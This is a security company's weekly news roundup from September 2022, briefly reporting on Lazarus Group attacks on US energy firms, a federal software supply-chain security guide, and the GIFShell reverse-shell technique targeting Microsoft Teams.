Skip to content
Imran ViraniSep 13, 20223 min read

Security Impurities: News of the Week (September 7th - 13th)

Kore-Oh My: North Korea Takes Aim at US Energy Critical Infrastructure

In the latest efforts of North Korea's ongoing campaign of cyber warfare, state-backed Advanced Persistent Threat (APT) group Lazarus has taken aim at the corporate networks of US energy suppliers. These cyber attacks, which took place from February to July of this year, utilized VMWare Horizon (a virtual desktop cloud platform) exploits to gain initial access into these networks, wherein Lazarus would use custom malware families and a remote access trojan (RAT) known as MagicRAT to steal data from compromised devices. Long famous for its stealing of sensitive data and its ransomware attacks, Lazarus's motive behind these attacks (other than financial) seems to be utilizing this stolen information to shore up energy sector capabilities in North Korea. While US energy leaders may experience some relief in these attacks being only of a fact-finding nature, they still show the vulnerabilities of US critical infrastructure.

Fed-al to the Meddle: US Governmental Agencies Offer Cybersecurity Guidance for Securing Supply Chains

With the rise of government intervention and oversight into matters of cybersecurity, a number of US security agencies have released a guide to secure software supply chains. Earlier this month, the NSA, CISA, and the Office of the Director of National Intelligence (ODNI) produced Securing the Software Supply Chain for Developers, released through the Enduring Security Framework (ESF).

What is the ESF?

The NSA describes the ESF as a "public-private cross-sector working group led by NSA and CISA that provides cybersecurity guidance addressing high priority threats to the nation’s critical infrastructure."

The Significance of this Guide

Ensuring the safety of software supply chains is a critical part of any tech organization's security framework, and each company's supply chain offers its own unique challenges and complexities. This guide, which recommends the best practices for developers to improve their security regarding software supply chains, is meant to be applicable in multiple scenarios, allowing developers to incorporate and customize these tips for their secure software development lifecycle (secure SDLC). By detailing common threat scenarios and providing recommendations malleable enough to be applied to the security frameworks of many different organizations, this guide is a welcome example of federal oversight in the private tech sector.

Beware of Geeks Bearing GIFts: Reverse Shell Attack Targets Microsoft Teams

The concept of GIFs being used to conduct malware attacks may seem like something you might read about in the Tech section of The Onion, but a recent reverse shell attack technique used to target Microsoft Teams shows that this prospect is both very real and no laughing matter.

What is a Reverse Shell?

A reverse shell attack is a way for hackers to inflict malicious code on networks by bypassing firewalls. The attacker can exploit reverse shelling through spam, phishing emails, and malware websites. It is installed locally on the user's computer, which initiates incoming connections with the command servers of the attacker.

The GIFShell Attack

This new attack known as 'GIFShell" allows hackers to chain vulnerabilities in Teams and compromise Microsoft's infrastructure by delivering malware via GIFs. After bypassing Teams' security controls, these attackers convince their targets to install a stager that executes commands and then send GIFS containing these commands. Because Microsoft supports the sending of HTML GIFs but does not scan their byte content for malware, GIFShell attackers can complete their nefarious actions by sending seemingly harmless GIFs. While the GIFShell attack is a relatively new, complex, and low-level threat, one that Microsoft seems in no rush to fix with patches to the Teams software, it shows that any communication on the internet can be exploited, and hackers are always willing to find these exploits.